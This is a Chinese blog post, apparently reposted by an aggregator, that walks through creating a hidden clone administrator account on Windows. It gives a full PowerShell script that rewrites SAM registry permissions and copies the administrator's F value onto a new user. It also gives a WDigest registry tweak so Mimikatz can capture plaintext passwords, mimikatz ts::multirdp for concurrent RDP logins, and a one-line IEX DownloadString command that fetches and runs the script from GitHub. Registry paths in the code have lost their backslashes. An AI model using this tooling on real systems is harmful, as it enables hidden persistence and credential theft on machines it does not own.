隐藏用户建立(Powershell)
Posted err0">tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了隐藏用户建立(Powershell)相关的知识,希望对你有一定的参考价值。
最近做测试的时候发现,windows server2012 使用Mimikatz是直接抓不到明文密码的,而且,直接创建的账号登陆有时会碰到这个问题:
ps:2012抓明文需要HKLM:SYSTEMCurrentControlSetControlSecurityProvidersWDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,才能记录到明文密码。
后来发现以前的建立克隆账号的方式是可以使得新建的账号登陆系统的,为了方便,整理了一个powershell脚本,脚本可以自动修改注册表键值权限(需要用administrator权限运行,即bypassuac以后的权限
),之后在进行操作。具体代码如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
|
function Create-Clone { < # .SYNOPSIS This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user. .PARAMETER u The clone username .PARAMETER p The clone user‘s password .PARAMETER cu The user to clone, default administrator .EXAMPLE Create-Clone -u evi1cg -p evi1cg123 -cu administrator #> Param( [Parameter(Mandatory=$ true )] [String] $u, [Parameter(Mandatory=$ true )] [String] $p, [Parameter(Mandatory=$ false )] [String] $cu = "administrator" ) function upReg{ "HKEY_LOCAL_MACHINESAM [1 17]" | Out-File $ env :tempup.ini "HKEY_LOCAL_MACHINESAMSAM [1 17]" | Out-File -Append $ env :tempup.ini "HKEY_LOCAL_MACHINESAMSAMDomains [1 17]" | Out-File -Append $ env :tempup.ini "HKEY_LOCAL_MACHINESAMSAMDomainsAccount [1 17] " | Out-File -Append $ env :tempup.ini "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [1 17] " | Out-File -Append $ env :tempup.ini "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [1 17]" | Out-File -Append $ env :tempup.ini cmd /c "regini $env:tempup.ini" Remove-Item $ env :tempup.ini } function downreg { "HKEY_LOCAL_MACHINESAM [1 17]" | Out-File $ env :tempdown.ini "HKEY_LOCAL_MACHINESAMSAM [17]" | Out-File -Append $ env :tempdown.ini "HKEY_LOCAL_MACHINESAMSAMDomains [17]" | Out-File -Append $ env :tempdown.ini "HKEY_LOCAL_MACHINESAMSAMDomainsAccount [17] " | Out-File -Append $ env :tempdown.ini "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [17] " | Out-File -Append $ env :tempdown.ini "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [17]" | Out-File -Append $ env :tempdown.ini cmd /c "regini $env:tempdown.ini" Remove-Item $ env :tempdown.ini } function Create-user ([string]$Username,[string]$Password) { $group = "Administrators" $existing = Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$Username" if (!$existing) { Write-Host "[*] Creating new local user $Username with password $Password" & NET USER $Username $Password /add /y /expires :never | Out-Null Write-Host "[*] Adding local user $Username to $group." & NET LOCALGROUP $group $Username /add | Out-Null } else { Write-Host "[*] Adding existing user $Username to $group." & NET LOCALGROUP $group $Username /add | Out-Null $exist = $adsi.Children | where {$_.SchemaClassName - eq ‘user‘ -and $_.Name - eq $Username } Write-Host "[*] Setting password for existing local user $Username" $exist.SetPassword($Password) } Write-Host "[*] Ensuring password for $Username never expires." & WMIC USERACCOUNT WHERE "Name=‘$Username‘" SET PasswordExpires=FALSE | Out-Null } function GetUser-Key([string]$user) { cmd /c " echo HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames$user [1 17] >> $env:temp$user.ini" cmd /c "regini $env:temp$user.ini" Remove-Item $ env :temp$user.ini if (Test-Path -Path "HKLM:SAMSAMDomainsAccountUsersNames$user" ){ cmd /c "regedit /e $env:temp$user.reg " HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames$user "" $ file = Get-Content "$env:temp$user.reg" | Out-String $pattern= "@=hex((.*?)):" $ file -match $pattern |Out-Null $key = "00000" +$matches[1] Write-Host "[!]" $key return $key } else { Write-Host "[-] SomeThing Wrong !" } } function Clone ([string]$ukey,[string]$cukey) { "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$ukey [1 17] " | Out-File $ env :tempf.ini "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$cukey [1 17] " | Out-File $ env :tempf.ini cmd /c " regini $env:tempf.ini" Remove-Item $ env :tempf.ini $ureg = "HKLM:SAMSAMDomainsAccountUsers$ukey" |Out-String $cureg = "HKLM:SAMSAMDomainsAccountUsers$cukey" |Out-String Write-Host "[*] Get clone user‘F value" $cuFreg = Get-Item -Path $cureg.Trim() $cuFvalue = $cuFreg.GetValue( ‘F‘ ) Write-Host "[*] Change user‘F value" Set-ItemProperty -path $ureg.Trim() -Name "F" -value $cuFvalue $outreg = "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$ukey" cmd /c "regedit /e $env:tempout.reg $outreg.Trim()" } function Main () { if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator" )) { Write-Output "Script must be run as administrator" break } Write-Output "[*] Start" Write-Output "[*] Tring to change reg privilege !" upReg if ( !(Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$cu" )){ Write-Host "[-] The User to Clone does not exist !" Write-Output "[*] Change reg privilege back !" downReg Write-Output "[*] Exiting !" } else { if (!(Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$u" )){ $tmp = "1" } else { $tmp = "0" } Write-Output "[*] Create User..." Create-user $u $p Write-Output "[*] Get User $u‘s Key .." $ukey = GetUser-Key $u |Out-String Write-Output "[*] Get User $cu‘s Key .." $cukey = GetUser-Key $cu |Out-String Write-Output "[*] Clone User.." Clone $ukey $cukey if ($tmp - eq 1 ){ Write-Output "[*] Delete User.." cmd /c "net User $u /del " |Out-Null } else { Write-Output "[*] Don‘t need to delete.." } cmd /c "regedit /s $env:temp$u.reg" cmd /c "regedit /s $env:tempout.reg" Remove-Item $ env :temp*.reg Write-Output "[*] Change reg privilege back !" downreg Write-Output "[*] Done" } } Main } |
GITHUB:
新建账号以后,可成功登陆系统
在Win7上做的测试如下:
当然可以配合这个姿势来实现多用户登陆。
使用mimikatz.exe,执行ts::multirdp
允许多用户远程登录
ps:该方法在系统重启后失效,下次使用需要重新执行命令ts::multirdp,也可通过修改文件termsrv.dll实现永久修改
最后是远程执行的方式:
1
|
powershell IEX (New-Object Net.WebClient).DownloadString( ‘https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1‘ ); Create-Clone -u demo$ -p test123 |
以上是关于隐藏用户建立(Powershell)的主要内容,如果未能解决你的问题,请参考以下文章